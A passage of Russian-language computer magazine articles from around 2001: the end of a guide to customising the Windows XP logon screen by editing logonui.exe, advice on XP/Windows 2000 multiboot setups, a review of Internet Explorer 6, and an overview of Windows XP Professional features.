изображение которой читается из ресурса 112 (rcbmp(112,…). После фона идут теги
"style" toppanelss и bottompanelss, представляющие две границы экрана
- верхнюю и нижнюю. Любой тег "style", который содержит строку
"rgb(X,X,X)" позволяет вам менять цвет определяемого элемента. Цвет в
данном случае пишется в RGB. Главное не забывайте, что пробелы после запятых
между значениями должны отсутствовать - "rgb(255,216,0)". Если вы
затрудняетесь в определении значений RGB для нужного вам цвета, используйте палитру
Photoshop. Ниже по тексту вы найдете описания многих элементов. Описывать все
их в данной статье я смысла не вижу. Надеюсь, сами разберетесь, там ничего
особо сложного нет.
Мы все время
говорили о цвете. Но ведь вы можете менять и шрифты, которыми выводятся
надписи, и, что еще важнее, расположение и размеры полей с именем пользователя
и ввода пароля. Это в гораздо большей степени позволяет менять интерфейс, но и
навыков дизайнера для этого иметь надо больше, так как по числовым значениям
координат представить себе четко расположение того или иного элемента на экране
не так то просто. В общем я вам сказал о такой
возможности, а вы уж сами сам с усами.
Поменяв все,
что нужно нажмите на кнопку "Compile Script" вверху правой части окна
программы, и все ваши изменения будут сохранены.
Пока мы все
еще в программе редактирования ресурсов, давайте посмотрим, что еще можно
просто и быстро переделать, не прилагая особых усилий. Взглянув на дерево
ресурсов слева в окне ResHack, видим папку String Table. В ней папки 1, 2, 3, 4
и 7 содержат все текстовые сообщения, какие только могут появиться на экране
входа в систему WinXP - от приветствий до сообщений об ошибках. Отличный повод
сделать небольшую русификацию своей системы - будет
чем похвастать перед друзьями "Русская XP еще вышла, но у меня уже есть
:-)". Короче, проявите свою фантазию.
Ну вот, все
самое страшное позади. Теперь осталось лишь сохранить ваш
модифицированный logonui.exe. После чего откройте XPLogon UI, выберите
созданный вами вариант и скажите использовать его.
Команда
завершения сеанса текущего пользователя позволит вам немедленно начать
любоваться своим творением.
Вперед, XP
зовет!
Освежить знания об основных принципах и
процедурах построения многовариантных систем на базе Windows 2000 и NT поможет
приведенный во врезке список статей, опубликованных в предыдущих выпусках
журнала.
Прежде чем погрузиться в процесс конфигурирования
системы с мультизагрузкой XP Professional и Windows 2000 Professional, следует продумать
ряд вопросов. Первый вопрос касается целесообразности использования
динамических дисков. Windows 2000 обеспечивает поддержку новой структуры дисков
(динамические диски), которая заменила используемую в NT структуру,
унаследованную из MS-DOS. (О динамических дисках рассказывается в статье того
же автора «Что собой представляют динамические диски», опубликованной в №4
Windows 2000 Magazine/RE за
Второй вопрос связан с рекомендацией Microsoft о
размещении каждой из загружаемых операционных систем на отдельном разделе. Если
установить несколько операционных систем на одном разделе, могут возникнуть
конфликты при работе с некоторыми файлами и каталогами, такими, как Program
Files и Documents and Settings. Если при создании систем с мультизагрузкой для
предыдущих версий операционных систем можно было не следовать рекомендации
«одна система на одном разделе», то при конфигурировании системы, включающей
Windows XP, ее учитывать необходимо. Конечно, потенциальные проблемы всегда
одни и те же. Но в случае с Windows XP придется иметь дело с бета-версией или с
только что выпущенной версией программного продукта. Поэтому, во-первых, при
возникновении каких-либо трудностей нельзя будет рассчитывать на помощь
Microsoft, а во-вторых, опасность возникновения конфликтов и потери данных
будет существенно выше.
Если на компьютере установлена операционная
система Windows 2000 Professional, и под нее выделено все (или почти все)
дисковое пространство, то для установки Windows XP придется либо добавить новые
диски, либо переразметить существующие. При работе с динамическими дисками
менять размер томов и создавать новые тома достаточно просто. Но для обычных
дисков выполнить переразметку разделов не так легко, и лучше для этого использовать
программное обеспечение независимого поставщика. Моя любимая программа для
разметки дисков — PartitionMagic 6.0 компании Power Quest. Она работает быстро
и надежно, поддерживает разделы FAT12, FAT16, FAT32, HPFS, NTFS 4.0, NTFS 5.0
(NTFS5), Linux ext2 и Linux swap.
Есть еще одно важное правило, актуальное для
систем с мультизагрузкой Windows XP, Windows 2000 и Windows NT: имена
компьютеров для установленных операционных систем не должны совпадать (т. е.
при каждой новой установке операционной системы имя компьютера должно
отличаться от всех предыдущих). Для каждой из установленных на машине систем в
домене создается отдельная учетная запись, которой соответствует свой
идентификатор SID, поэтому имена, присваиваемые этим учетным записям, должны быть
уникальны.
Если этим правилом пренебречь, последствия могут
быть самые неожиданные, от конфликтов при регистрации на серверах WINS или DNS
до всевозможных проблем с доступом к ресурсам. Кроме того, в данном случае
опять-таки нельзя будет рассчитывать на помощь Microsoft.
Если используется система шифрования файлов
Encrypting File System (EFS) и доступ к зашифрованным файлам необходимо
обеспечить как из Windows XP Professional, так и из Windows 2000 Professional,
обе эти операционные системы должны состоять в одном домене. Кроме того, при
регистрации в любой из двух операционных систем необходимо использовать
перемещаемый профиль (roaming profile). Это нужно для того, чтобы вся
информация, необходимая для доступа к зашифрованным данным, была в распоряжении
каждой из операционных систем. Другой способ обеспечения доступа предполагает
экспорт сертификатов пользователей для шифрования файлов и личных ключей из
одной системы в другую.
После того как все подготовительные работы будут
завершены, инсталляцию системы с мультизагрузкой рекомендуется производить так,
чтобы самую новую операционную систему устанавливать последней. Более новые
версии Windows лучше распознают предыдущие версии и легко встраиваются в
существующую конфигурацию. Кроме того, подобный порядок установки операционных
систем позволяет избежать ситуации, когда при добавлении более старой системы
на компьютер, где уже установлена более новая операционная система,
перезаписывается загрузочный сектор более новой системы. Поэтому, если нужно
установить Windows XP Professional и Windows 2000 Professional, вначале следует
поставить Windows 2000 Pro, а затем Windows XP Pro. Большинству пользователей
такой порядок установки покажется вполне естественным. Однако те, кому придется
строить новую систему или переустанавливать существующие, не должны забывать об
этой рекомендации.
Итак, планируя установку на одном компьютере
Windows XP Professional и Windows 2000 Professional, необходимо определить,
целесообразно ли использовать динамические диски, нужно ли изменять структуру
существующих дисков или добавлять новые дисковые накопители для XP
Professional. Ответив на эти вопросы и придумав разные имена компьютера для
каждой из версий Windows, можно вставлять в дисковод компакт-диск с файлами
установки Windows XP Professional и начинать знакомиться с новой версией
Windows 2000.
ЗНАКОМЬТЕСЬ: MICROSOFT INTERNET EXPLORER |
26
октября сего года, безо всякой помпы и рекламной шумихи, тихо и, можно
сказать, по домашнему, вышла в свет новая версия одного из самых популярных,
и в то же время самых скандальных продуктов Microsoft - броузер Internet
Explorer 6.0 (я имею в виду то количество судебных процессов, сопровождающих
весь период его существования, да и просто шквал нелицеприятных заявлений о
нем с момента
появления первых версий броузера в около- и компьютерной прессе). В этом
обзоре я попытаюсь кратко рассказать о некоторых, наиболее заметных
особенностях новой версии, а также об ее отличиях от
широко распространенных IE 5.0 и 5.5 (которые, впрочем, являются близнецами -
братьями). Как и все последние продукты
от Microsoft (Office XP, Windows Media Player 8 и т.д.), броузер Internet
Explorer 6 выполнен с использованием ряда элементов
ключевых технологий, разрабатываемых в рамках перспективной сетевой
архитектуры DotNet, и уже частично применяемых в новейшей операционной
системе Windows XP. Броузер сможет также работать и на всех остальных
32-битовых версиях Windows, за исключением Windows 95, поддержка
которой сворачивается компанией Microsoft исключительно по маркетинговым
соображениям. По задумкам стратегов из Редмонда, это будет еще одним
дополнительным стимулом к смене операционной системы теми несознательными
пользователями, которые слишком увлеклись использованием этой устаревшей ОС.
Возвращаясь непосредственно к новому броузеру, хочу
сразу отметить, что никаких сенсационных откровений его новая версия, являясь
логичным преемником пятого поколения броузеров от Microsoft, не принесла.
Отличия носят, по большей части, косметический характер, связанные с
использованием элементов нового оформления графического интерфейса Windows
XP, в которую броузер интегрирован, хотя и появилась
поддержка целого ряда новых сетевых технологий. Впрочем, это и неудивительно:
несмотря на то, что в последние годы Всемирная сеть обогатилась рядом новых
интересных и полезных сервисов, в первую очередь связанных с передачей
мультимедийной информации, подавляющая масса пользователей интернета
достаточно консервативна и остается приверженцами традиционных сетевых услуг
- протоколов HTTP (cо всеми его расширениями и
дополнениями), FTP, электронной почте и общению с использованием
Интернет-пейджеров. По этой причине все, что можно ожидать от Internet
Explorer 6,- это дальнейшее повышение удобства пользования этими сервисами, а
также скорости их выполнения. Из основных
нововведений, прежде всего, хочется отметить улучшенную поддержку имеющихся и
включение ряда новых сетевых технологий. Так, Internet
Explorer 6 обеспечивает полную поддержку технологии создания динамически
изменяющегося пользовательского интерфейса DHTML, стандарта CSS 1 (Cascading
Style Sheets), определяющего использование стилей при оформлении
Web-страницы, а также стандарта на информационное наполнение страницы DOM 1
(Document Object Model), позволяющего осуществлять динамический доступ и
обновление содержимого, структуры и стиля документов без каких-либо
ограничений с точки зрения применяемых языков и платформ. Кроме того,
появилась поддержка даже находящегося еще в стадии разработки нового языка
SMIL (Synchronized Multimedia Integration Language) 2.0, предназначенного для
создания с помощью фильтров различных эффектов для текста и графических
изображений, причем, все эффекты выполняются в реальном времени и не требуют
использования сценариев. Можно отметить и новую политику Microsoft в
отношении защиты персональной информации о пользователе. Internet Explorer 6
теперь поддерживает стандарт P3P (Platform for Privacy Preferences),
описывающий параметры сбора и обработки файлов cookies, в которых могут
храниться как персональные сведения о пользователе, так и настройки, выбранные
им в ходе посещения конкретного Web-узла. Проблема состоит в том, что на
сайте, затребовавшем Вашу персональную информацию, обычно присутствует
достаточное количество интегрированных в него сторонних элементов: это и
счетчики посещений, баннерные рекламные системы и т.п., которые тем самым
также получают доступ к информации из cookie. Возможно, для большинства
пользователей это не имеет особого значения, однако далеко не все из нас
готовы хоть в какой-то мере уподобляться персонажам скандальной программы
"За стеклом". Использование же стандарта P3P теперь предоставляет
возможность пользователю самостоятельно определять, какой объем персональной
информации о себе он готов выставить на всеобщее обозрение в Сети. Каждый
сайт, который следует стандарту P3P, должен в XML-файле предоставить свою
контактную информацию, описать, какие данные и зачем он собирает и какой
методики придерживается при сборе cookies. Считывая этот файл, броузер
определит, насколько сайт соответствует стандартам P3P. Естественно, все это
больше является заделом на будущее, так как на сегодняшний день количество
ресурсов, в той или иной степени поддерживающих эти спецификации, пока еще
очень ограничено. Непосредственно в
броузере пользователь может очень легко установить режим обработки cookies, используя для этого специальный ползунок в закладке
Privacy. Всего доступны 6 его положений: в наиболее защищенном режиме
блокируются все cookies, в наименее защищенном - разрешен полный доступ как для записи, так и для и считывания. Наряду с
интегрированным в Windows ХР простейшим firewall-ом,
такая система может обеспечить уровень защиты от деструктивных сетевых
воздействий, вполне удовлетворяющий запросам не самых требовательных
пользователей. Microsoft усилила
взаимодействие между Internet Explorer и Windows Media Player, что выразилось
в появлении новой дополнительной панели инструментов Media Bar. Пользователи
теперь смогут искать и проигрывать мультимедийные файлы (в форматах Windows
Media Audio или Video) через Media Bar, расположенную,
подобно существующим панелям, в левой части рабочего окна броузера. Что касается работы с
графическими изображениями, то вызывает определенный интерес еще одна новая
функция, называющаяся Autoresize. Теперь большие изображения автоматически
масштабируются так, чтобы поместиться в текущем окне броузера. В нижнем
правом углу при этом появляется кнопка масштабирования, нажав на которую,
можно менять режимы отображения картинки: уменьшенное изображение или же в
натуральную величину. В предыдущих версиях Internet Explorer можно было
достаточно легко сохранять понравившиеся картинки, найденные на просторах
Сети - стоило лишь нажать на правую кнопку мышки и выбрать "Save Picture
As…", но плавающая панелька, появившаяся в шестой версии броузера
позволяет сделать это еще проще. Если поместить
указатель мыши над достаточно крупной картинкой на сайте, то автоматически
появится панель инструментов Image Bar. Один щелчок - и изображение можно
сохранить на жесткий диск, распечатать на принтере или отправить по
электронной почте. Здесь же легко получить доступ к папке "Мои
рисунки". Хотя компания Microsoft
и заявила, что в новой версии Internet Explorer-а исправлены все ошибки
предыдущих версий, и он отличается в лучшую сторону от своих предшественников
в плане стабильности и скорости в работе, тем не менее, в Сети уже появились
первые "заплатки", исправляющие свежеобнаруженные в новинке ошибки.
Без сомнения, будут они выявляться и в дальнейшем, ведь никогда не
существовали в природе программные продукты от Microsoft, не требующие
постоянных "патчей" и исправлений. Для разрешения таких ситуаций
программисты Microsoft сделали пусть и небольшой, но, все-таки, шаг вперед по
сравнению с предыдущими версиями программы: теперь вместо привычного
сообщения "Приложение выполнило недопустимую операцию и будет
закрыто" появляется диалоговое окно с предложением выслать разработчикам
автоматически сгенерированный системой отчет об ошибке. По результатам
анализа неисправности в службе технической поддержки Microsoft, пользователю
может быть предложено автоматически скачать
необходимые исправления или обновления для программы, если они, конечно,
существуют в природе. А теперь пару слов о замеченных недостатках в новой
версии. Internet Explorer 6 поддерживает виртуальную машину Java, однако JVM
не входит в стандартную инсталляцию. Этот модуль будет установлен на Ваш
компьютер отдельно, причем только в случае загрузки Web-страницы,
использующей Java-апплеты. Кроме того, многолетнее противостояние двух
основных соперников в войне броузеров привело к тому, что теперь Internet
Explorer больше не поддерживает модули Plug-in Netscape. И последнее. Очень
жаль, что в настройках нового броузера так и не появилась возможность ручного
выбора программ, вызываемых броузером при просмотре и редактировании
различных документов. Мне, например, совсем не по вкусу использовать встроенный в систему Notepad для первичного редактирования
HTML-документов. Поэтому, как и в прошлых версиях, для обеспечения быстрого
вызова более удобных и симпатичных редакторов Dreamweaver и Aditor,
приходиться долго и нудно редактировать Системный Реестр Windows вручную. Подводя итоги обзора
нового продукта Microsoft, хочется выставить ему оценку, основываясь не
только на достаточно широких потенциальных возможностях рассматриваемого
броузера, но и привести свои собственные, признаю, достаточно субъективные,
суждения. Дело в том, что подавляющее большинство его новых "фич"
лично мною просто-напросто никогда не будут востребованы. Так, например,
зачем мне, как и большинству моих соотечественников, "сидящих" на
медленном и ненадежном модемном соединении, все эти Media Bar-ы? Смотреть
потоковое видео или слушать сетевое радио? Не смешите. Поддержка практически
всех новых технологий просмотра текста и графики тоже "не
стреляют". Дело в том, что все они используются в основном только для
создания все более навороченных рекламных баннеров и
другой шелухи подобного рода, которая безжалостно вырезается установленными у
меня баннерорезками. То же можно сказать и про cookies - уже давно, не веря в
добрые намерения сетевого сообщества, сижу я за огненной стеной firewall-а, и
с "кукисами" он прекрасно разбирается сам. Так что из всех
нововведений остаются только большие и красочные кнопки на панелях броузера,
а вот стоят ли они того, что бы менять "шило на мыло", решать вам
самим, дорогие читатели. |
С выходом октябрьской версии Windows XP компания
Microsoft вывела Windows на следующий виток эволюции операционных систем. XP призвана заменить не только Windows 2000 и Windows NT, но и
системы Windows Me и Windows 9x. Как и Windows 2000, система XP базируется на
32-разрядном ядре NT. Но, в отличие от своей предшественницы, XP
позиционируется как для корпоративного, так и для домашнего использования. XP
зародилась в тот момент, когда Microsoft разделила направления разработки
операционных систем на клиентское (XP) и серверное семейство .NET Server, ранее
известное под названием Whistler. Чтобы определиться, стоит ли на роль базовой
корпоративной настольной системы выбирать XP, нужно иметь представление о
функциональных возможностях новой операционной системы.
Microsoft выпустила три новые версии XP: XP Home Edition,
XP Professional и XP 64-Bit Edition. XP Home, предназначенная для домашнего применения и
малого бизнеса, по сути является модификацией Windows
9x. Операционная система XP Professional предназначена для пользователей
Windows 2000 Professional или NT Workstation 4.0. Хотя XP Home и XP Pro
базируются на одном и том же системном ядре, ориентированная
на применение в сфере бизнеса, XP Pro обладает расширенной функциональностью по
сравнению с XP Home. На Рисунке 1 перечислены возможности XP Pro, отсутствующие
в XP Home. Обе операционные системы можно заказать через специализированные
магазины или получить предустановленными при покупке
компьютера. 64-разрядную версию XP можно приобрести с компьютером на базе
процессора Intel Itanium от доверенного производителя: например,
Hewlett-Packard (HP), Dell, IBM или Compaq.
Неудивительно, что требования к системам XP Home
и XP Pro и Windows 2000 Professional очень похожи. В Таблице 1 приведен список
минимальных и рекомендуемых системных параметров. По сложившейся в Microsoft
традиции — особенно это касается RAM — требования явно занижены. Поэтому, как и
при работе с Windows 2000, для достижения приемлемого уровня производительности
XP необходим значительно больший объем памяти. Я протестировал XP Pro на
системах с процессорами 450 MГц и 1,2 ГГц с одинаковым
объемом памяти 128 Mбайт, и в обоих случаях производительность впечатляла. Как
правило, производительность настольной системы под управлением Windows 2000 при
переходе на XP остается примерно на том же уровне.
Как и следовало ожидать, XP поддерживает
аппаратные средства, имеющиеся на рынке на момент выпуска системы: например,
высокопроизводительные жесткие диски с интерфейсом ATA100, шину IEEE 1394
(FireWire), устройства CD-R и CD-RW. В XP предусмотрена возможность записи
компакт-дисков на устройствах CD-R и CD-RW, так что специальные программы от
независимых производителей не понадобятся. Для записи на компакт-диск нужно
просто выбрать в Windows Explorer интересующие файлы и перетащить их мышью на
значок устройства CD-R , CD-RW или DVD-RAM. Дополнительно разработчики
Microsoft встроили в новую операционную систему возможность создания
компакт-диска с помощью программ Windows Media Player (WMP) и NT Backup. Для
DVD-RAM добавлена поддержка файловой системы FAT32. Однако для самых последних
моделей DVD-RW в базовой поставке поддержка не предусмотрена.
Те пользователи, у которых на домашнем
компьютере уже установлена система Windows Me или Windows 98, скорее всего,
предпочтут модернизировать текущую версию до XP Home. Корпоративные
пользователи с Windows 2000 Professional и NT Workstation 4.0 с помощью
процедуры обновления смогут перейти на XP Pro. Но если используется Windows 95
или более ранняя версия Windows, обновление невозможно. Придется устанавливать
систему заново. На Рисунке 2 изображены возможные способы перехода на Windows
XP.
|
Рисунок 2. Пути перехода к
XP. |
Собственно процесс установки XP, как и Windows
2000, достаточно прост. Если машина работает в сети, в процессе инсталляции
нужно будет указать имя компьютера, имя рабочей группы или домена, а также
адрес TCP/IP, если в сети нет сервера DHCP. По умолчанию при установке XP в
домене функция Fast User Switching отключается (эта
функция позволяет нескольким пользователям работать на одной машине). После
установки в домене и перезагрузки система выводит на экран обновленную версию
диалогового окна Windows Logon. От начала до конца установка системы вручную
занимает около 30 мин. Как и в случае с Windows 2000 Professional, можно
воспользоваться технологией Remote Installation Services (RIS) для инсталляции
систем с удаленного сервера в автоматическом режиме. В некоторых случаях, как
будет описано ниже, после установки может потребоваться активация продукта
(дополнительная информация об этом приведена во врезке «Процедура активации Windows
Product Activation»).
После обновления Windows 2000 до уровня XP ранее
открытые для общего доступа каталоги становятся недоступны. Чтобы этого не
произошло, нужно запустить Network Setup Wizard и проинформировать систему о
намерении в дальнейшем использовать совместный доступ к файлам. Впрочем,
выделить каталоги в общий доступ всегда можно заново. Разработчики Microsoft
объяснили, что эта особенность программы обновления реализована из соображений
безопасности.
Для новой операционной системы в Microsoft
разработан пользовательский интерфейс (неофициальное название — Luna),
позволяющий новичкам без труда выполнять наиболее общие задачи. Однако опытных
пользователей Windows 2000 или NT 4.0 новый интерфейс, вероятно, может
раздражать. Местоположение ряда привычных объектов (например, Administrative
Tools и значка My Computer) изменилось. Кроме того, новый интерфейс по
сравнению со своими предшественниками для выполнения тех же задач требует
больше манипуляций с мышью и перемещений по различным экранам. Тем не менее
«картинка», в общем-то, изменилась мало. Пользователи, работавшие в Windows
2000, Windows Me и Windows 98, должны быстро привыкнуть к новому интерфейсу. Он
более лаконичен: по умолчанию на рабочем столе отображается только один значок
— Recycle Bin. Графические значки стали больше по размеру, меню Start
переработано, а фоном по умолчанию служит подложка в мягких голубых тонах (меню
Start представлено на Экране 1).
|
Экран 1. Меню
Start системы XP. |
В новом меню Start две позиции вверху слева
зафиксированы для Web-браузера и программы электронной почты клиента, принятой
по умолчанию. При желании можно использовать любой Web-браузер и любую
программу электронной почты, а не только Microsoft Internet Explorer (IE) и
Microsoft Outlook Express. Часто используемые программы автоматически
появляются в меню Start внизу слева. Значки WMP, MSN Explorer, Windows Movie
Maker и Tour Windows XP по умолчанию отображаются, но их всегда можно удалить.
Для установленных программ используется подменю All Programs. Элементы,
расположенные в правой части меню Start, выполняют те же задачи, что и меню
Start в Windows 2000. А Control Panel наконец-то вынесена
на верхний уровень меню Start.
|
Экран 2. Панель управления
системы XP. |
В отличие от панели управления Windows 2000, где
программы, связанные с обслуживанием системы, перечислены по отдельности,
панель управления XP (см. Экран 2) отображает ссылки на категории системных
функций. Щелчок по ссылке — и появляется более детализированный список задач. Например, если выбрана категория
Network and Internet Connections, XP выведет на экран диалоговое окно, содержащее некоторый список задач, доступных для
выполнения, среди которых Set up or change your Internet connection,
Create a connection to the network at your workplace, а также Set up or change your home or small office network. Выбрав любую из них, пользователь тем самым запускает
программу Network Setup Wizard, которая будет руководить процессом выполнения
задачи. Названное диалоговое окно также содержит значки Internet Options и
Network Connections. Следует выбрать один из них для вывода окна, в котором
настраиваются свойства указанного объекта. Если же пользователь предпочитает
стиль интерфейса Windows 2000, достаточно переключиться на режим Switch to
Classic View.
В XP реализован ряд усовершенствований в области
интерфейса пользователя: переработана панель задач (taskbar) и в настройку
панели добавлен параметр Group similar taskbar buttons. С помощью этого
параметра можно сгруппировать схожие между собой объекты. Если данный параметр
указан, XP группирует множество экземпляров одного приложения под одним
значком. На самой панели задач выводятся стрелочки и многоточия, которые
помогают следить за процессом группировки объектов. По щелчку на значке панели
задач система выводит меню, в котором показаны все экземпляры открытого
приложения. Следуя концепции минимализма, мастер Desktop Cleanup Wizard
автоматически удаляет с рабочего стола все значки, обращение к которым
происходит нерегулярно. Следующее усовершенствование — функция Web-Views,
использующая список задач в стиле Dynamic HTML (DHTML) с привязкой к текущему
каталогу для создания контекстно-зависимого списка задач. Например, когда с
помощью Windows Explorer открывается каталог, в окошке WebView выводятся
доступные пользователю задачи, связанные с управлением каталогами, такие, как
Create a new folder и Share a folder. Когда Windows Explorer работает с
файлами, в окошке WebView выводятся задачи, относящиеся к манипуляциям с файлами,
— Copy a file и Delete a file.
XP Pro предоставляет те же средства управления
системой, что и Windows 2000, включая политики Group Policy, перемещаемые
профили Roaming Profiles, установку с помощью RIS и IntelliMirror. Однако
разработчики XP усовершенствовали многие функции. Так, Group Policy в XP
позволяют настраивать параметры регистрации в сети (Netlogon). К примеру,
пользователь может задействовать Group Policy для конфигурирования настроек
клиента DNS и перенаправления содержимого My Documents в свой домашний каталог.
Усовершенствования в Roaming Profiles включают возможности настройки
взаимодействия с автономными offline-каталогами,
наложения запрета копирования на сервер перемещаемого профиля при каждом его
изменении, а также запрета использования такого профиля на тех или иных
компьютерах. Служба RIS в реализации XP позволяет удаленно устанавливать
Windows 2000 и .NET Server наряду с XP Pro.
В XP Pro появилась новая функция управления —
автоматическое обновление Automatic Updates. С ее помощью администраторы
системы могут автоматически загружать и устанавливать важнейшие обновления
(например, пакеты исправлений Service Pack), а также модули коррекции системы
безопасности и обновления для драйверов устройств. Загрузка обновлений
осуществляется в фоновом режиме, после чего система предлагает установить
обновления. Включение и выключение этой функции выполняется на вкладке
Automatic Updates (см. Экран 3) в меню Start, Control Panel,
Performance and Maintenance, System.
|
Экран 3. Закладка
автоматического обновления. |
Следующая новая функция управления XP,
автоматическое восстановление Automated System Recovery (ASR), обеспечивает
надежную защиту от ошибок типа Unexpected System Failure. Компонент
резервирования ASR сохраняет состояние системы, служб и дисков. Кроме того,
создается файл, содержащий резервную информацию, конфигурацию дисков, а также
инструкции по процедуре восстановления для конкретного случая. Компонент
восстановления ASR в дальнейшем будет использовать данные из названного файла
для восстановления ранее сохраненного состояния системы.
XP Pro поддерживает функцию отказа от
использования драйвера Device Driver Roll Back, которая
позволяет заменить неисправный драйвер устройства ранее установленной версией.
Чтобы воспользоваться функцией Device Driver Roll Back, следует открыть Device
Manager, щелкнуть на значке неисправного устройства и выбрать Properties из
контекстного меню. Затем нужно выбрать вкладку Driver и щелкнуть Roll Back
Driver, чтобы вернуться к первоначальному драйверу устройства. Всякий раз,
когда устанавливается неподписанный драйвер (unsigned device driver), XP
автоматически создает Restore Point, своеобразную точку возврата, которая
используется для восстановления системы.
XP Pro имеет ряд важных функций, которые были
разработаны в помощь администраторам IT-подразделений. Во-первых, это большое
количество новых утилит командной строки (см. Таблицу 2), взятых в основном из
Microsoft Windows 2000 Resource Kit. Во-вторых, XP Pro способна
работать с файлами журналов, размер которых превышает 1 Гбайт, а журналы
событий теперь могут содержать встроенные ссылки URL на различные Web-сайты,
где можно получить дополнительную информацию. В-третьих, система NTFS в XP
поддерживает тома в режиме только чтения read-only, что позволяет облегчить
системное резервирование.
Специалисты Microsoft изначально ставили перед
собой задачу создать единую платформу для перехода как с Windows 2000, так и с
Windows 9x. А это значит, что XP должна быть совместима с DOS и приложениями
Windows 9x. Чтобы достичь лучшей совместимости с 16-разрядным DOS, разработчики
подкорректировали виртуальную машину Virtual DOS Machine (VDM). В результате XP
может работать с такими программами DOS, с которыми Windows 2000 или NT
работать не могли, а под управлением Windows Me или Windows 98 для этого
требовался особый режим DOS (режим работы Windows 9x, при котором программы DOS
запускались в однозадачном режиме). Новая виртуальная машина XP более
эффективно эмулирует управление памятью Windows 9x, и это позволило решить
немало проблем, с которыми пользователи сталкивались при работе с 16-разрядным
программным обеспечением под управлением 32-разрядного ядра NT. Разработчики
Microsoft также добавили в машину DOS VDM системы XP звуковую поддержку
Creative Technology Sound Blaster 2.0 для старых игр и приложений DOS.
Наиболее значительные изменения, затрагивающие
сетевой компонент XP, внесены в службу Windows Messenger, которая теперь
заменяет приложения MSN Messenger (быстрый обмен сообщениями) и Net-Meeting
(организация видеоконференций). Служба Windows Messenger обеспечивает возможность
обмена сообщениями, проведения видео- и
аудиоконференций, а также поддержку совместной работы (эта функция относится к
службе Remote Assistance, о которой вкратце будет рассказано).
Усовершенствованная технология передачи аудио- и видеоинформации позволяет с
помощью Windows Messenger обеспечить проведение конференций по модему и по
обычным линиям DSL (Digital Subscriber Line, цифровая абонентская линия).
В отличие от NetMeeting, служба Windows
Messenger базируется на протоколе Session Initiation Protocol (SIP), упрощенном
коммуникационном протоколе реального времени, который использует для
организации вызовов электронные адреса участников (к сожалению, алгоритмы
работы с протоколом SIP у Windows Messenger и NetMeeting несовместимы между
собой). Новая функция подавления эха (acoustic-echo-canceling) позволяет
участникам Windows Messenger использовать стандартный
PC-микрофон (вместо головного телефона) для проведения качественной
аудиоконференции. Для повышения качества связи по DSL и широкополосным соединениям
разработчики встроили в Windows Messenger поддержку 16-килобитного аудиокодека
SIREN от Sonic Foundry. Кроме того, Windows Messenger поддерживает сессии с
системами MSN Messenger. К сожалению, служба Windows Messenger несовместима со
службой AOL Instant Messenger.
Для того чтобы воспользоваться Windows Messenger
через Internet, сначала необходимо получить учетную запись в службе Microsoft
Passport. Microsoft Passport — бесплатная служ-ба,
выполняющая аутентификацию пользователя и инициализацию вызова. Корпоративные
пользователи могут в качестве сервера аутентификации задействовать Microsoft
Exchange 2000 Conferencing Server. Кроме того, готовящийся к выпуску продукт
.NET Server позволяет осуществлять поддержку Windows Messenger. На Экране 4
представлен пример сессии видеоконференции с использованием Windows Messenger.
|
Экран 4. Работа с Windows
Messеnger. |
Внедрение коммуникационных программ класса SOHO
в XP предоставляет пользователям системы возможность совместной работы с
соединениями Internet Connection Sharing (ICS), по аналогии с одноименной
службой Windows 2000, и персональный брандмауэр Internet Connection Firewall
(ICF). ICS позволяет задействовать XP в роли Internet-шлюза для других систем
локальной сети. ICS в XP обеспечивает базовые
службы DHCP, DNS и Network Ad-dress Translation (NAT) для сетевых клиентов. При
этом система с ICS не должна быть постоянно подключена к Internet: систе-мы клиентов можно сконфигурировать по принципу dial on
demand (предоставление канала по требованию) — ICS-шлюз будет автоматически
подключаться к Internet по мере необходимости.
Функция ICF динамически открывает и закрывает
коммуникационные порты, используемые в сетевых программах. ICS поддерживает
таблицы соединений, инициируемые локальными системами, и входящий
Internet-трафик может достигнуть локального адресата только в случае наличия в
ICF-таблице соответствующей записи — это означает, что процесс обмена
информацией был начат именно из данной локальной сети. Хотя шлюз ICF в XP по
многообразию возможностей уступает специализированным продуктам класса
firewall, тем не менее на рынке SOHO и пользователей
модемов служба ICF занимает очень важную нишу. XP Pro автоматически запускает
службу ICF всякий раз, когда устанавливается ICS-соединение.
Одна из наиболее полезных новых коммуникационных
функций XP — утилита Network Diagnostics, программа для диагностики и
устранения системных и сетевых проблем. Network Diagnostics позволяет узнать
текущий статус Internet-служб (почты, новостей), получить сведения о компьютере
(системное имя, тип загрузки, объем RAM), информацию об операционной системе
(номер сборки, дату установки, номер версии), а также проверить статус модемов
и сетевых адаптеров. Чтобы запустить Network Diagnostics, нужно выбрать пункт Scan your system
(Start, Control Panel, Network and Internet Connections, Network Diagnostics). На Экране 5 показаны результаты подобного сканирования.
|
Экран 5. Проверка сетевых
настроек. |
При тестировании сетевых адаптеров Network
Diagnostics проверяет статус драйверов сетевых адаптеров и опрашивает шлюз,
настроенный по умолчанию, основной и вторичный DNS-серверы, а также локальный
IP-адрес. Утилита выводит отметки Passed или Failed для каждого проверяемого
сетевого компонента и предоставляет другую полезную информацию о сети, в том
числе IP-адреса шлюза, сервера DNS и сканируемого компьютера. Результаты работы
Network Diagnostics могут быть сохранены в файле, который при необходимости можно
переслать по электронной почте или FTP в службу поддержки.
Усовершенствованы также коммуникационные
возможности XP в области беспроводной связи. XP позволяет выполнять
сканирование на наличие беспроводной сети и автоматически настраивать сетевые
карты стандарта 802.11 для подключения к ней. Эта функция полезна для мобильных
пользователей при подключении к общедоступным ресурсам. XP поддерживает
стандарт IEEE 802.1X для выполнения аутентификации при
сетевом доступе.
В том, что касается поддержки пользователя, XP
демонстрирует исключительные возможности. Во-первых, в системе переработана
справочная служба (Help). Поисковые возможности новой Help
интегрированы с Web, поэтому поиск не ограничивается рамками локального компьютера,
но затрагивает и базу данных Microsoft Knowledge Base. Дополнительно
можно настроить связь с конференциями новостей Microsoft и новой секцией Did
you know?, в которой Microsoft или OEM-партнер поддерживает ссылки на всевозможные Web-сайты. Каждый раз при обращении в Help
and Support Center система связывается с Web-сайтом и обновляет заголовки в
секции Did you know?. На Экране 6 показано основное окно Help and Support
Center.
|
Экран 6. Система поддержки
системы XP. |
Хотя возможности поддержки пользователей
усовершенствованы по сравнению с предыдущими версиями Windows, единообразие в
работе аналогичных служб Microsoft — TechNet, Microsoft Developer Network
(MSDN) или MSDN Web site — отсутствует. Программа Help не запоминает предыдущие
запросы, результаты запросов выводятся по-разному. В одном случае система может
показать результаты запроса в отдельном окне, в другом — во всплывающем окне, в
третьем — как обновление содержимого окна Help and Support Center. В процессе
тестирования по мере перемещения по ссылкам Help-системы я зачастую терял
исходную индексную запись или список поиска.
Однако при тестировании наиболее интересных
